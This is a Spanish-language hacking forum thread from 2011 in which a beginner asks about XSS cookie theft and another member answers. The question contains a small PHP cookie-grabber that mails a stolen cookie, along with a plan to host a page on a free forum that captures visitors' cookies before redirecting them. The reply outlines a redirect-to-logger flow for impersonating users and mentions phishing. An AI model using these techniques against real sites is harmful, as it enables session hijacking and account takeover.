|
Título: 2 Dudas acerca de XSS Publicado por: Asaroth en 21 Abril 2011, 18:35 pm He leido varios tutoriales de XSS de esta misma web, pero siempre quedo con las mismas dos interrogantes. Son muy basicas y pueden estar erróneas, lo sé xD pero que mejor manera de aprender que preguntar? ;D espero que alguien pueda sacarme la duda... Tengo entendido que se puede obtener el valor de una cookie remota y enviarlo por correo mediante php, hasta ahi todo bien:
<? php $cookie = $_GET["cookie"]; mail("correo", "Asunto del msj", $cookie); ?> Es posible que dicho código se ejecute automáticamente al ingresar a una web? (como si fuera un script o algo asi... hablo internamente osea en el propio código html, sin llamar archivos externos)... y al pulsar un botón?Entiendo que PHP se ejecuta del lado del servidor y HTML del lado del cliente, por eso la duda, leí que esto era posible mediante AJAX o algo por el estilo, alguna idea? Por otro lado: No entiendo el porqué del "<script>alert()</script>" ni de ciertas partes del proceso, que el objetivo de un ataque XSS no es que el usuario ingrese y ejecute un cierto código para capturar y enviar la cookie a un tercero? Entonces yo podría crear una página en formato html en un foro (foroactivo por ej. permite crear páginas html que se ejecuten antes del foro) y colocar el código alli... el usuario entra, ejecuta el código y se lo redirecciona a otro foro cualquiera mediante la instrucción: <META http-equiv=Refresh content='0;URL=www.loquesea.com'> es decir que el usuario nunca ingresa al foro original sino que ve la html creada, se capturan las cookies y se lo redirecciona, obiamente podría crearla si yo soy el propietario del foro pero como crear uno allí es gratuito y libre para todos, es cuestión de segundos. La idea es usar XSS sin tener que estar subiendo archivos o enviando links sospechosos, solo el link de un foro propio y un poco de programación web... es posible atacar así? Si estas dos cosas se pudieran hacer sería muy sencillo un XSS no? :huh: No se si se entendió mi idea XD Saludos y gracias ;D Título: Re: 2 Dudas acerca de XSS Publicado por: Shell Root en 21 Abril 2011, 20:13 pm Recuerdo la frase que me ha motivado durante muchos años... ]Una vulnerabilidad es tan limitada como tu quieras que sea.
El objetivo del XSS es principalmente obtener la cookie del usuario con el fin de suplantarlo. Esto se hace con el ya conocido código -en este caso, sólo la mostramos-. Código Ahora ya para capturarla, -por lo general en un archivo de texto-, se hace mediante PHP y una redicción con JS. Cuando el usuario esté situado y loggeado, se ejecute el XSS, lo redireccione a la pagina PoC, pasando por metodo GET el valor de la cookie. También con el XSS podéis hacer algo de phishing. |